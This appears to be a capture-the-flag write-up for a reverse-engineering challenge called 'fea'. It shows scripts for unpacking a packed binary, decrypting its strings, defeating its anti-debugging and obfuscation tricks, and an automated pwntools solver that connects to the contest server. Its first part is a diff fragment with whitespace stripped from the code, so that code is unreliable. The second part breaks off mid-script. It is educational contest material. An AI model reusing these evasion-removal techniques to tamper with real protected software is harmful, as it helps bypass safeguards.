It seems to install a SIGALARM handler and also mmaps 0xDEAD0000. The SIGALARM handler basically just sets a variable, such that main can advance. While this looked a lot nicer, it was still clearly obfuscated. I remembered reading about similar obfuscation and there being an IDA plugin that can help with that.
+
+
I found the plugin again and it proved to be quite useful: https://eshard.com/posts/d810_blog_post_1/
+
+
With the plugin installed and configured correctly (make sure to turn off the rules about global variables), functions suddenly looked perfectly fine again:
At first, I thought this was just another anti debugging technique, but as it turns out later, this is used in the binary.
+Next, we see that it just waits for the first alarm, then unpacks a buffer and executes it (at an offset). My team mate started working on an unpacker. He said “the source code is self documenting”, so here you go ;):
+
+
#!/usr/bin/env python3
+
+
+defunpack(binary):
+ packed_full=binary[0x60d0:]# TODO: find real size
+unpacked=bytearray()
+
+ # the packed data is always consumed linearly, so just "eat" prefixes to avoid annoying index calc
+packed=packed_full
+
+ defeat(n):
+ nonlocalpacked
+ val=packed[:n]
+ packed=packed[n:]
+ returnval
+
+ defeat_byte():
+ returneat(1)[0]
+
+ firsthigh=packed[0]>>5
+ assertfirsthigh==0orfirsthigh==1
+ big_chungus=(firsthigh==1)
+ assertbig_chungus# could remove this assert, but it seems like every chal is actually big chungus
+
+ # remove high bits from very first byte to treat it like a regular memcpy
+packed=bytes([packed[0]&0x1f])+packed[1:]
+
+ defeat_size():
+ # yeah, this is shitty code
+ifbig_chungus:
+ eaten=eat_byte()
+ result=eaten
+ whileeaten==0xff:
+ # print("BIG CHUNGUS SIZE")
+eaten=eat_byte()
+ result+=eaten
+ returnresult
+ else:
+ returneat_byte()
+
+
+ # this ends up reading more than the size of the original packed buffer, which means it produces garbage at the end.
+# we probably don't care, but TODO: possibly fix this
+whilelen(packed):
+ firstbyte=eat_byte()
+ high,low=firstbyte>>5,firstbyte&0x1f
+ # print(high, low)
+ifhigh==0:
+ # simple memcpy
+size=low+1
+ unpacked+=eat(size)
+ else:
+ ifhigh==7:# all bits set
+size=(high-1)+eat_size()+3
+ else:
+ size=(high-1)+3
+ least_sig_offset=eat_byte()
+ rel_offset=-(least_sig_offset+1+0x100*low)
+ # print("size ", size)
+ifbig_chungusandleast_sig_offset==0xffandlow==0x1f:
+ # print("BIG CHUNGUS OFFSET")
+most_sig=eat_byte()
+ least_sig=eat_byte()
+ rel_offset=-(0x2000+(most_sig<<8)+least_sig)
+
+ # print("rel offset ", rel_offset, "; size", size, "; copied", len(unpacked))
+assert-rel_offset<=len(unpacked)
+ offset=rel_offset+len(unpacked)
+ # existing = unpacked[offset:offset+size]
+# unpacked += existing.ljust(size, b"\x00")
+# weird memmove aliasing behavior means we need to copy byte by byte
+foriinrange(size):
+ unpacked+=bytes([unpacked[offset+i]])
+ returnunpacked
+
+if__name__=="__main__":
+ filename="chals/chal_16"
+ binary=open(filename,'rb').read()
+ unpacked=unpack(binary)
+ open(filename+"__unpacked","wb").write(unpacked)
+
+
+
+
+
In case the source code isn’t quite as self-documenting as he claimed:
+
+
+
In every binary, the packed data always starts at a constant offset 0x60d0. This makes it easy to extract. While the length varies by some amount (and could be extracted from the binary), it turned out to be sufficient to simply decode as much as we can and ignore the excess.
+
We’re not sure if the format of the packed data is well-known somehow (or a variant of something well-known), but it’s fairly simple either way.
+
The packed data consists of a sequence of what we will call chunks. The 3 most significant bits of the first byte of a chunk determine its type:
+
+
If they’re 0, this is a simple “constant” chunk. The size is determined by least significant 5 bits plus 1, i.e. (firstbyte & 0x1f) + 1 bytes of data follow, which are copied into the output.
+
If they’re non-zero, the chunk references a certain amount of bytes from the output that was already written, relative to the end of the output buffer. Both the size and the relative offset are encoded in a variable-length scheme.
+
+
The contents of the output buffer are memmoved instead of memcpy‘d. Special care has to be taken for cases where the source and destination memory ranges overlap, which can and does happen.
+
+
+
+
+
The very first chunk is always treated as constant data. Its 5 most significant bits instead set what we call the big_chungus flag (True if they are equal to 1, False if 0, error of they’re set to anything else). This flag appears to enable some additional variable-length encoding of sizes and offsets, and always seems to be set to true in the binaries we were given. The unpacking function in the binary, sub_404740, in fact calls two different functions; the big-chungus-enabled sub_403E50 or the apparently unused sub_402760.
+
+
+
I patched out the anti debugging checks and signal handlers and started debugging.
+I dumped the unpacked code into a binary file and loaded it into IDA once again.
+I also continued debugging the unpacked code. It was really annyoing to debug and statically analyze, since most functions have the following snippet interspersed every few instructions:
Basically, this skips over the byte after the second call and hence IDA cannot really reconstruct the control flow / figure out where instructions are. However, this is nothing a little IDA scripting can’t fix ;):
Basically, this goes through the instructions and if it sees a call to such a function, it patches it with a jmp to the next byte. Armed with this and debugging some more, it becomes apparent what the function does (manual decompilation):
Unfortunately, for the longest time, I thought that sub_0 was getting called with our input and not zeroes (more on that later). In any case, I tried running angr on it, but it seemed to not really work. One issue was that sub_0 actually has a lot of int 3 instructions. I tried doing the following to implement the sighandler from the binary, but I still didn’t get an answer2:
So I started reving sub_0 manually (still thinking it depended on our input and hence we would need to know what it does). Unfortunately, even with the patched binary, IDA still didn’t want to include all of the function in the function, so some more scripting later, I was finally able to hit decompile on the whole thing:
Before being able to hit F5 and see something, I had to increase the max function size in IDA (this was already very promising), but I finally got to see it in all it’s glory:
Obviously, this was not going to be possible to reverse by hand. However, it seemed to be just constant operations. Just for the fun of it, I added two rules to the aforementiond deobfuscation plugin:
+
+
+
replace nullsubs with nops
+
replace __debugbreak with *0xDEAD0000 ^= 0xDEADBEEF
+
+
+
I did this by adding the following to chain_rules.py:
And then I realized, oh our input is constant and hence this just sets our input to the constants seen above. My teammate wrote a quick binary, that mmaps the unpacked shellcode, runs the sub_0 function and prints the resulting values:
The final piece of the puzzle left, was function sub_223F3, which actually does something with our input. Fortunately, it seems it was exactly the same for every binary. I translated it into z3 and was able to solve for our input (after wasting some time debugging why it wasn’t working, because I mistyped v1 as v4):
With all of that done, we can now write our exploit script and get the flag :):
+
+
#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+# This exploit template was generated via:
+# $ pwn template --host 111.186.58.164 --port 30212
+frompwnimport*
+fromhashlibimportsha256
+fromitertoolsimportproduct
+importre
+frompwnlib.tubes.tubeimporttube
+# import pow
+
+# Set up pwntools for the correct architecture
+context.update(arch='i386')
+exe='./path/to/binary'
+
+# Many built-in settings can be controlled on the command-line and show up
+# in "args". For example, to dump all data sent/received, and disable ASLR
+# for all created processes...
+# ./exploit.py DEBUG NOASLR
+# ./exploit.py GDB HOST=example.com PORT=4141
+host=args.HOSTor'111.186.58.164'
+port=int(args.PORTor30212)
+
+deflocal(argv=[],*a,**kw):
+ '''Execute the target binary locally'''
+ ifargs.GDB:
+ returngdb.debug([exe]+argv,gdbscript=gdbscript,*a,**kw)
+ else:
+ returnprocess([exe]+argv,*a,**kw)
+
+defremote(argv=[],*a,**kw):
+ '''Connect to the process on the remote host'''
+ io=connect(host,port)
+ ifargs.GDB:
+ gdb.attach(io,gdbscript=gdbscript)
+ returnio
+
+defstart(argv=[],*a,**kw):
+ '''Start the exploit against the target.'''
+ ifargs.LOCAL:
+ returnlocal(argv,*a,**kw)
+ else:
+ returnremote(argv,*a,**kw)
+
+# Specify your GDB script here for debugging
+# GDB will be launched if the exploit is run via e.g.
+# ./exploit.py GDB
+gdbscript='''
+continue
+'''.format(**locals())
+
+#===========================================================
+# EXPLOIT GOES HERE
+#===========================================================
+
+defsolve_proof_of_work(hashable_suffix,hash):
+ alphabet=(string.ascii_letters+string.digits+'!#$%&*-?')
+ forhashable_prefixinproduct(alphabet,repeat=4):
+ current_hash_in_hex=sha256((''.join(hashable_prefix)+hashable_suffix).encode()).hexdigest()
+ ifcurrent_hash_in_hex==hash:
+ return''.join(hashable_prefix)
+
+
+io=start()
+
+proof_of_work_line=io.recvline(keepends=False).decode("utf-8")
+io.recvline()
+hashable_suffix=re.search('sha256\(XXXX\+(.*)\) ==',proof_of_work_line).group(1)
+hash=re.search('== (.*)',proof_of_work_line).group(1)
+log.info("Solving POW %s for %s",hashable_suffix,hash)
+proof=solve_proof_of_work(hashable_suffix,hash)
+io.sendline(proof)
+io:tube
+
+importbase64
+
+defread_challenge():
+ io.readuntil("Here is your challenge:")
+ # swallow 2 newlines
+io.recvline()
+ io.recvline()
+ challenge=io.recvline()
+ returnbase64.b64decode(challenge)
+
+foriinrange(3):
+
+ log.info("Downloading challenge %d",i)
+ chal1=read_challenge()
+ withopen(f"chal{i}","wb")asf:
+ f.write(chal1)
+
+ importunpack
+ log.info("Unpacking challenge")
+ unpacked=unpack.unpack(chal1)
+
+ withopen(f"chal{i}_unpacked","wb")asf:
+ f.write(unpacked)
+
+ log.info("Running wrapper")
+ p=process(["./wrapper",f"chal{i}_unpacked"])
+ res1=p.readuntil(" ")
+ res1=int(res1,16)
+ res2=p.readuntil("\n")
+ res2=int(res2,16)
+
+ log.info("Targets: 0x%x, 0x%x",res1,res2)
+
+ importdo_solve
+ sender=do_solve.do_solve(res1,res2)
+
+ io.send(sender)
+
+io.interactive()
+
+
+
+
+
+
For some reason I tried making a fast GPU based POW solver, turns out it’s slower than just python hashlib :face_palm: ↩
+
+
+
This was probably for other reasons, angr did manage to work later on. ↩
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/0CTF-2021/rev/fea.md b/0CTF-2021/rev/fea.md
new file mode 100755
index 0000000..78acf43
--- /dev/null
+++ b/0CTF-2021/rev/fea.md
@@ -0,0 +1,936 @@
+# fea
+
+**Authors:** gallileo, null
+**Tags:** rev, obfuscation
+**Points:** 458
+**Description:**
+> nc 111.186.58.164 30212
+
+Only a netcat connection as description for a rev challenge, off to a good start I see. After connecting and solving the POW[^1], we receive the following:
+
+```
+[1/3]
+Here is your challenge:
+
+f0VMRgIBAQAAAAAAAAAAAAIAPgAB...
+
+Plz beat me in 10 seconds X3 :)
+```
+
+So it seems that this is a twist on the old automatic exploitation challenge :).
+I wrote a quick script to collect as many samples as possible, thinking that maybe they were just cycling a few different binaries:
+
+```python
+class chal_info:
+ def __init__(self, idx, md5):
+ self.md5 = md5
+ self.occurrences = 1
+ self.idx = idx
+
+ def did_see(self):
+ self.occurrences += 1
+
+ @property
+ def filename(self):
+ return os.path.join("samples", f"chal_{self.idx}")
+
+idx = 0
+chals: Dict[str, chal_info] = {}
+while True:
+ try:
+ io = start()
+
+ proof_of_work_line = io.recvline(keepends=False).decode("utf-8")
+ io.recvline()
+ hashable_suffix = re.search('sha256\(XXXX\+(.*)\) ==', proof_of_work_line).group(1)
+ hash = re.search('== (.*)', proof_of_work_line).group(1)
+ log.info("Solving POW %s for %s", hashable_suffix, hash)
+ proof = solve_proof_of_work(hashable_suffix, hash)
+ io.sendline(proof)
+ io: tube
+
+ import base64
+
+ def read_challenge():
+ io.readuntil("Here is your challenge:")
+ # swallow 2 newlines
+ io.recvline()
+ io.recvline()
+ challenge = io.recvline()
+ return base64.b64decode(challenge)
+
+ chal = read_challenge()
+
+ chal_md5 = hashlib.md5(chal).hexdigest()
+ if chal_md5 in chals:
+ chals[chal_md5].did_see
+ else:
+ info = chal_info(idx, chal_md5)
+ idx += 1
+ chals[chal_md5] = info
+ with open(info.filename, "wb") as f:
+ f.write(chal)
+
+ log.info("Statistics:")
+ for key, chal in chals.items():
+ print(f"\t{chal.filename}: #{chal.occurrences} ({chal.md5})")
+
+
+ io.close()
+ except:
+ log.warning("Had an error")
+```
+
+I started analyzing one of the binaries in my favourite disassembler. `main` looked pretty bad and the other functions didn't look pretty either:
+
+```c
+__int64 __fastcall main(__int64 a1, char **a2, char **a3)
+{
+ int v3; // esi
+ int v4; // ecx
+ int v5; // eax
+ int v6; // ecx
+ int v7; // ecx
+ int i; // [rsp+4Ch] [rbp-34h]
+ int v10; // [rsp+5Ch] [rbp-24h]
+ char *s; // [rsp+60h] [rbp-20h]
+
+ sub_400D90(a1, a2, a3);
+ s = (char *)mmap(0LL, 0x100000uLL, 7, 34, -1, 0LL);
+ memset(s, 0, 0x100000uLL);
+ for ( i = 911436592; ; i = v4 )
+ {
+ while ( 1 )
+ {
+ while ( 1 )
+ {
+ while ( 1 )
+ {
+ while ( 1 )
+ {
+ while ( 1 )
+ {
+ while ( 1 )
+ {
+ while ( 1 )
+ {
+ if ( i == -1611068981 )
+ {
+ perror(aPu);
+ exit(-1);
+ }
+ if ( i != -1554549674 )
+ break;
+ i = 1518786008;
+ usleep(0x186A0u);
+ }
+ if ( i != -1535510725 )
+ break;
+ v10 = sub_404740(&unk_6060D0, 73569LL, s, 0xFFFFFFLL);
+ v7 = -1085199925;
+ if ( !v10 )
+ v7 = -1611068981;
+ i = v7;
+ }
+ if ( i == -1297152665 )
+ {
+ perror(a1P);
+ exit(-1);
+ }
+ if ( i != -1085199925 )
+ break;
+ sub_400EC0();
+ i = 1628391944;
+ ((void (*)(void))&s[dword_6060C0])();
+ }
+ if ( i != -122192319 )
+ break;
+ sub_400EC0();
+ i = 1518786008;
+ }
+ if ( i != 610093714 )
+ break;
+ v5 = sub_4014E0();
+ v6 = -1554549674;
+ if ( v5 != dword_6180D0 )
+ v6 = 620693745;
+ i = v6;
+ }
+ if ( i != 620693745 )
+ break;
+ ((void (*)(void))loc_400AC0)();
+ i = -1554549674;
+ }
+ if ( i != 911436592 )
+ break;
+ v3 = -122192319;
+ if ( s == (char *)-1LL )
+ v3 = -1297152665;
+ i = v3;
+ }
+ if ( i != 1518786008 )
+ break;
+ v4 = -1535510725;
+ if ( !dword_6180CC )
+ v4 = 610093714;
+ }
+ munmap(s, 0x100000uLL);
+ return 0LL;
+}
+```
+
+I also noticed that the strings must be encrypted, because one of the functions was doing a `sprintf` without any format specifiers in a weird looking string:
+
+```c
+snprintf(s, 0x400uLL, &byte_618040, v8);
+char byte_618040[16] =
+{
+ '\xE6', '\xB9', '\xBB', '\xA6', '\xAA', '\xE6', '\xEC', '\xAD', '\xE6', '\xAA', '\xA4', '\xAD', '\xA5', '\xA0', '\xA7', '\xAC'
+};
+
+```
+
+One xref later, we found an init function that decrypts the string. Some IDA scripting later, and we can decrypt the strings in the binary:
+
+```python
+import idaapi
+import ida_segment
+import logging
+log = logging.getLogger("decrypt_strings")
+
+def do_init_array():
+ seg: idaapi.segment_t = ida_segment.get_segm_by_name(".init_array")
+ log.info("Found init_array: 0x%x - 0x%x", seg.start_ea, seg.end_ea)
+ funcs = []
+ ea = seg.start_ea
+ idx = 1
+ while ea != idaapi.BADADDR and ea < seg.end_ea:
+ func_addr = idaapi.get_qword(ea)
+ funcs.append(func_addr)
+ idaapi.set_name(func_addr, f"init{idx}")
+ ea += 8
+ idx += 1
+ return funcs
+
+init_funcs = do_init_array()
+
+dec_loop_size = 0x43
+dec_addr_off = 0x12
+dec_key_off = 0x18
+dec_size_off = 0x26
+import idc
+
+def decrypt_string(loop_start):
+ log.info("Decrypting string@0x%x", loop_start)
+ mov_insn = idaapi.insn_t()
+ xor_insn = idaapi.insn_t()
+ sub_insn = idaapi.insn_t()
+ idaapi.decode_insn(mov_insn, loop_start+dec_addr_off)
+ idaapi.decode_insn(xor_insn, loop_start+dec_key_off)
+ idaapi.decode_insn(sub_insn, loop_start+dec_size_off)
+ addr = mov_insn.Op2.addr
+ key = xor_insn.Op2.value
+ size = sub_insn.Op2.value
+ log.info("Decrypting string @ 0x%x of size 0x%x", addr, size)
+ dec_str = ""
+ for i in range(size+1):
+ car = idaapi.get_byte(addr + i)
+ dec_car = (car ^ key) & 0xff
+ dec_str += chr(dec_car)
+ idaapi.patch_byte(addr + i, dec_car)
+
+ idaapi.create_strlit(addr, 0, 0)
+
+ log.info("Decrypted string: %s", dec_str)
+
+def decrypt_strings():
+ decrypt_string_func = init_funcs[0]
+ log.info("Decrypt strings@0x%x", decrypt_string_func)
+ curr = decrypt_string_func
+ for i in range(8):
+ decrypt_string(curr)
+ curr += dec_loop_size
+
+decrypt_strings()
+```
+
+Turns out the strings were not so useful after all, they are just used for anti debugging. Basically, the binary checks whether the command line is one of `gdb`, `strace`, `ltrace` or `linux_server64`, and if yes, enters infinite recursion.
+
+However, I also found another interesting looking init function:
+
+```c
+__int64 init4()
+{
+ __int64 result; // rax
+ int v1; // esi
+ unsigned int i; // [rsp+2Ch] [rbp-14h]
+ void *s; // [rsp+30h] [rbp-10h]
+
+ signal(14, sub_400AF0);
+ alarm(1u);
+ dword_6180D0 = sub_4014E0();
+ s = mmap((void *)0xDEAD0000LL, 0x1000uLL, 3, 34, -1, 0LL);
+ memset(s, 0, 0x1000uLL);
+ for ( i = 691787201; ; i = v1 )
+ {
+ result = i;
+ if ( i == -794482235 )
+ break;
+ if ( i == 397321255 )
+ {
+ perror(a1P);
+ exit(-1);
+ }
+ v1 = -794482235;
+ if ( s == (void *)-1LL )
+ v1 = 397321255;
+ }
+ return result;
+}
+
+```
+It seems to install a SIGALARM handler and also mmaps `0xDEAD0000`. The SIGALARM handler basically just sets a variable, such that main can advance. While this looked a lot nicer, it was still clearly obfuscated. I remembered reading about similar obfuscation and there being an IDA plugin that can help with that.
+
+I found the plugin again and it proved to be quite useful: https://eshard.com/posts/d810_blog_post_1/
+
+With the plugin installed and configured correctly (make sure to turn off the rules about global variables), functions suddenly looked perfectly fine again:
+
+```c
+__int64 __fastcall main(__int64 a1, char **a2, char **a3)
+{
+ char *s; // [rsp+60h] [rbp-20h]
+
+ sub_400D90();
+ s = (char *)mmap(0LL, 0x100000uLL, 7, 34, -1, 0LL);
+ memset(s, 0, 0x100000uLL);
+ sub_400EC0();
+ while ( !dword_6180CC )
+ {
+ if ( (unsigned int)sub_4014E0() != dword_6180D0 )
+ ((void (*)(void))loc_400AC0)();
+ usleep(0x186A0u);
+ }
+ sub_404740(&unk_6060D0, 73569LL, s, 0xFFFFFFLL);
+ sub_400EC0();
+ ((void (*)(void))&s[dword_6060C0])();
+ munmap(s, 0x100000uLL);
+ return 0LL;
+}
+```
+
+After some basic analysis using our newly found powers, we can see that main is very simple:
+
+```c
+__int64 __fastcall main(__int64 a1, char **a2, char **a3)
+{
+ void (__fastcall **s)(__int64); // [rsp+60h] [rbp-20h]
+
+ setup();
+ s = (void (__fastcall **)(__int64))mmap(0LL, 0x100000uLL, 7, 34, -1, 0LL);
+ memset(s, 0, 0x100000uLL);
+ check_for_debugger();
+ while ( !did_alarm )
+ {
+ if ( (unsigned int)count_breakpoints() != init_num_bps )
+ ((void (*)(void))probably_crash)();
+ usleep(0x186A0u);
+ }
+ unpack(some_buf, 72638, (char *)s, 0xFFFFFF);
+ check_for_debugger();
+ ((void (*)(void))((char *)s + entry_off))();
+ munmap(s, 0x100000uLL);
+ return 0LL;
+}
+```
+
+`setup` sets up buffering, gets pid and checks the command line. It also installs the following interesting SIGTRAP handler:
+
+```c
+void handler()
+{
+ MEMORY[0xDEAD0000] ^= 0xDEADBEEF;
+}
+```
+
+At first, I thought this was just another anti debugging technique, but as it turns out later, this is used in the binary.
+Next, we see that it just waits for the first alarm, then unpacks a buffer and executes it (at an offset). My team mate started working on an unpacker. He said "the source code is self documenting", so here you go ;):
+
+```python
+#!/usr/bin/env python3
+
+
+def unpack(binary):
+ packed_full = binary[0x60d0:] # TODO: find real size
+ unpacked = bytearray()
+
+ # the packed data is always consumed linearly, so just "eat" prefixes to avoid annoying index calc
+ packed = packed_full
+
+ def eat(n):
+ nonlocal packed
+ val = packed[:n]
+ packed = packed[n:]
+ return val
+
+ def eat_byte():
+ return eat(1)[0]
+
+ firsthigh = packed[0] >> 5
+ assert firsthigh == 0 or firsthigh == 1
+ big_chungus = (firsthigh == 1)
+ assert big_chungus # could remove this assert, but it seems like every chal is actually big chungus
+
+ # remove high bits from very first byte to treat it like a regular memcpy
+ packed = bytes([packed[0] & 0x1f]) + packed[1:]
+
+ def eat_size():
+ # yeah, this is shitty code
+ if big_chungus:
+ eaten = eat_byte()
+ result = eaten
+ while eaten == 0xff:
+ # print("BIG CHUNGUS SIZE")
+ eaten = eat_byte()
+ result += eaten
+ return result
+ else:
+ return eat_byte()
+
+
+ # this ends up reading more than the size of the original packed buffer, which means it produces garbage at the end.
+ # we probably don't care, but TODO: possibly fix this
+ while len(packed):
+ firstbyte = eat_byte()
+ high, low = firstbyte >> 5, firstbyte & 0x1f
+ # print(high, low)
+ if high == 0:
+ # simple memcpy
+ size = low + 1
+ unpacked += eat(size)
+ else:
+ if high == 7: # all bits set
+ size = (high - 1) + eat_size() + 3
+ else:
+ size = (high - 1) + 3
+ least_sig_offset = eat_byte()
+ rel_offset = -(least_sig_offset + 1 + 0x100*low)
+ # print("size ", size)
+ if big_chungus and least_sig_offset == 0xff and low == 0x1f:
+ # print("BIG CHUNGUS OFFSET")
+ most_sig = eat_byte()
+ least_sig = eat_byte()
+ rel_offset = -(0x2000 + (most_sig << 8) + least_sig)
+
+ # print("rel offset ", rel_offset, "; size", size, "; copied", len(unpacked))
+ assert -rel_offset <= len(unpacked)
+ offset = rel_offset + len(unpacked)
+ # existing = unpacked[offset:offset+size]
+ # unpacked += existing.ljust(size, b"\x00")
+ # weird memmove aliasing behavior means we need to copy byte by byte
+ for i in range(size):
+ unpacked += bytes([unpacked[offset + i]])
+ return unpacked
+
+if __name__ == "__main__":
+ filename = "chals/chal_16"
+ binary = open(filename, 'rb').read()
+ unpacked = unpack(binary)
+ open(filename + "__unpacked", "wb").write(unpacked)
+
+
+```
+
+In case the source code isn't quite as self-documenting as he claimed:
+
+- In every binary, the packed data always starts at a constant offset `0x60d0`. This makes it easy to extract. While the length varies by some amount (and could be extracted from the binary), it turned out to be sufficient to simply decode as much as we can and ignore the excess.
+- We're not sure if the format of the packed data is well-known somehow (or a variant of something well-known), but it's fairly simple either way.
+- The packed data consists of a sequence of what we will call *chunks*. The 3 most significant bits of the first byte of a chunk determine its type:
+ - If they're 0, this is a simple "constant" chunk. The size is determined by least significant 5 bits plus 1, i.e. `(firstbyte & 0x1f) + 1` bytes of data follow, which are copied into the output.
+ - If they're non-zero, the chunk references a certain amount of bytes *from the output that was already written, relative to the end of the output buffer*. Both the size and the relative offset are encoded in a variable-length scheme.
+ - The contents of the output buffer are `memmove`d instead of `memcpy`'d. Special care has to be taken for cases where the source and destination memory ranges overlap, which can and does happen.
+- The very first chunk is always treated as constant data. Its 5 most significant bits instead set what we call the `big_chungus` flag (`True` if they are equal to 1, `False` if 0, error of they're set to anything else). This flag appears to enable some additional variable-length encoding of sizes and offsets, and always seems to be set to true in the binaries we were given. The unpacking function in the binary, `sub_404740`, in fact calls two different functions; the big-chungus-enabled `sub_403E50` or the apparently unused `sub_402760`.
+
+I patched out the anti debugging checks and signal handlers and started debugging.
+I dumped the unpacked code into a binary file and loaded it into IDA once again.
+I also continued debugging the unpacked code. It was really annyoing to debug and statically analyze, since most functions have the following snippet interspersed every few instructions:
+
+```x86asm
+nullsub_428:
+ ret
+
+call nullsub_428
+call sub_2258E
+
+sub_2258E:
+ add qword ptr [rsp+0], 1
+ retn
+```
+
+Basically, this skips over the byte after the second call and hence IDA cannot really reconstruct the control flow / figure out where instructions are. However, this is nothing a little IDA scripting can't fix ;):
+
+```python
+import binascii
+import idaapi
+import ida_funcs
+import ida_bytes
+import idc
+import logging
+log = logging.getLogger("patching")
+
+shitty_func = binascii.unhexlify("4883042401C3")
+
+def run(start, end):
+ log.info("Running from 0x%x - 0x%x", start, end)
+ curr = start
+ while curr != idaapi.BADADDR and curr < end:
+ # make code
+ # idaapi.del_items(curr)
+ insn = idaapi.insn_t()
+ ret = idaapi.create_insn(curr, insn)
+ if ret == 0:
+ idaapi.del_items(curr, 8)
+ idaapi.del_items(curr+1, 8)
+ ret = idaapi.create_insn(curr, insn)
+ if ret == 0:
+ log.error("Failed to create instruction at 0x%x", curr)
+ return
+ # insn_size = ret
+ next_ea = idaapi.get_first_cref_from(curr)
+ # if call, check if skip next byte
+ if idaapi.is_call_insn(insn):
+ call_addr = insn.Op1.addr
+ is_skip = True
+ log.info("Shitty func: %s", shitty_func.hex())
+ for i, c in enumerate(shitty_func):
+ if idaapi.get_byte(call_addr + i) != c:
+ log.info("Mismatched")
+ is_skip = False
+ break
+ if is_skip:
+ log.info("Identified skip call @ 0x%x", curr)
+ idaapi.patch_byte(curr, 0xe9)
+ idaapi.patch_byte(curr + 1, 0x01)
+ idaapi.del_items(curr)
+ idaapi.create_insn(curr, insn)
+ next_ea += 1
+ log.info("Next ea: 0x%x", next_ea)
+ # return
+ curr = next_ea
+ # patch to jmp rel
+ # else inc curr
+
+run(0x0, 0x222C8)
+```
+
+Basically, this goes through the instructions and if it sees a call to such a function, it patches it with a jmp to the next byte. Armed with this and debugging some more, it becomes apparent what the function does (manual decompilation):
+
+```c
+int user[2];
+int final[2] = {};
+
+read(0, user, 8);
+sub_223F3(user);
+sub_0(final);
+if (final[0] == user[0] && final[1] == user[1]) {
+ puts("Right!");
+} else {
+ puts("Wrong!");
+}
+```
+
+Unfortunately, for the longest time, I thought that sub_0 was getting called with our input and not zeroes (more on that later). In any case, I tried running angr on it, but it seemed to not really work. One issue was that sub_0 actually has a lot of int 3 instructions. I tried doing the following to implement the sighandler from the binary, but I still didn't get an answer[^2]:
+
+```python
+class SimEngineFailure(angr.engines.engine.SuccessorsMixin):
+ def process_successors(self, successors, **kwargs):
+ state = self.state
+ jumpkind = state.history.parent.jumpkind if state.history and state.history.parent else None
+
+ if jumpkind is not None:
+ if jumpkind == "Ijk_SigTRAP":
+ val = state.mem[0xDEAD0000].dword
+ state.mem[0xDEAD0000].dword = val.resolved ^ 0xDEADBEEF
+ self.successors.add_successor(state, state.regs.rip, state.solver.true, 'Ijk_Boring')
+ self.successors.processed = True
+ return
+
+ return super().process_successors(successors, **kwargs)
+
+
+class UberUberEngine(SimEngineFailure,angr.engines.UberEngine):
+ pass
+
+```
+
+So I started reving sub_0 manually (still thinking it depended on our input and hence we would need to know what it does). Unfortunately, even with the patched binary, IDA still didn't want to include all of the function in the function, so some more scripting later, I was finally able to hit decompile on the whole thing:
+
+```python
+def find_prev_next(addr):
+ res = idaapi.BADADDR
+ for i in range(10):
+ res = idaapi.get_first_cref_from(addr-i)
+ if res != idaapi.BADADDR:
+ return res
+ return res
+
+def append_chunk(curr):
+ if idaapi.append_func_tail(f, curr, idaapi.BADADDR):
+ print(f.tails.count)
+ print(f.tails[f.tails.count-1].start_ea)
+ end_ea = f.tails[f.tails.count-1].end_ea
+ print(hex(end_ea))
+ next_ea = find_prev_next(end_ea)
+ return next_ea
+ return None
+
+for i in range(400):
+ curr = append_chunk(curr)
+ if curr == idaapi.BADADDR:
+ print("ERROR")
+ break
+```
+
+Before being able to hit F5 and see something, I had to increase the max function size in IDA (this was already very promising), but I finally got to see it in all it's glory:
+
+```c
+__int64 __fastcall sub_0(__int64 a1)
+{
+ v603 = *(_DWORD *)a1 ^ *(_DWORD *)(a1 + 4);
+ nullsub_1(a1);
+ dword_DEAD0000 = v603 - 471 + 261;
+ __debugbreak();
+ v604 = (((dword_DEAD0000 - 396) & 0x7D ^ 0xCA | 0x1E1u) >> 2) | (((dword_DEAD0000 - 396) & 0x7D ^ 0xCA | 0x1E1) << 6);
+ nullsub_2();
+ nullsub_3();
+ dword_DEAD0000 = v604 / 0x1DF / 0x2E % 0x34;
+ __debugbreak();
+ v605 = (((unsigned int)dword_DEAD0000 >> 2) | (dword_DEAD0000 << 6)) % 0x25;
+ nullsub_4();
+ dword_DEAD0000 = ((((v605 - 292) % 0x16A) | 0x30) + 208) & 0x22;
+ __debugbreak();
+ dword_DEAD0000 = (((dword_DEAD0000 + 137) | 0xB9) ^ 0x166) + 67;
+ __debugbreak();
+ dword_DEAD0000 = (8 * (dword_DEAD0000 & 0x19E)) | ((unsigned __int16)(dword_DEAD0000 & 0x19E) >> 5);
+ __debugbreak();
+ v1 = (unsigned int)dword_DEAD0000 >> 5;
+ v606 = ((((((unsigned int)v1 | (8 * dword_DEAD0000)) ^ 0x1D8 | 0x33) + 87) % 0x2A / 0x1C5) ^ 0x25) % 0x7B;
+ // ---------------------------------
+ // ... around 2500 lines of this lol
+ // ---------------------------------
+ v602 = ((797940 * ((((unsigned int)v251 | (16 * v601)) + 293) & 0x1B6) - 477) << 6) | ((797940
+ * ((((unsigned int)v251 | (16 * v601))
+ + 293) & 0x1B6)
+ - 477) >> 2);
+ v723 = (((2 * v602) | (v602 >> 7)) >> 6) | (4 * ((2 * v602) | (v602 >> 7)));
+ *(_DWORD *)a1 = v723 - 0x50EF943B;
+ result = a1 + 4;
+ *(_DWORD *)(a1 + 4) = v723 - 0x6F1DB3B;
+ return result;
+}
+```
+
+Obviously, this was not going to be possible to reverse by hand. However, it seemed to be just constant operations. Just for the fun of it, I added two rules to the aforementiond deobfuscation plugin:
+
+- replace nullsubs with nops
+- replace __debugbreak with `*0xDEAD0000 ^= 0xDEADBEEF`
+
+I did this by adding the following to `chain_rules.py`:
+
+```python
+class NullSubChain(ChainSimplificationRule):
+ DESCRIPTION = "Replace calls to nullsubs with nops"
+
+ def check_and_replace(self, blk: mblock_t, ins: minsn_t):
+ if blk is None:
+ return None
+ mba: mba_t = blk.mba
+ if mba.maturity != MMAT_PREOPTIMIZED:
+ return None
+ if ins.opcode == m_call:
+ left: mop_t = ins.l
+ if left.t == mop_v:
+ name = idaapi.get_name(left.g)
+ if "nullsub" in name:
+ chain_logger.info("Found nullsub call at 0x%x", ins.ea)
+ blk.make_nop(ins)
+ return None #??
+
+ return super().check_and_replace(blk, ins)
+
+class DebugBreakChain(ChainSimplificationRule):
+ DESCRIPTION = "Replace calls to debugbreak with sigtrap handler implementation"
+
+ def check_and_replace(self, blk: mblock_t, ins: minsn_t):
+ if blk is None:
+ return None
+ mba: mba_t = blk.mba
+ if mba.maturity != MMAT_PREOPTIMIZED:
+ return None
+ if ins.opcode == m_call:
+ left: mop_t = ins.l
+ if left.t == mop_h:
+ if left.helper == "__debugbreak":
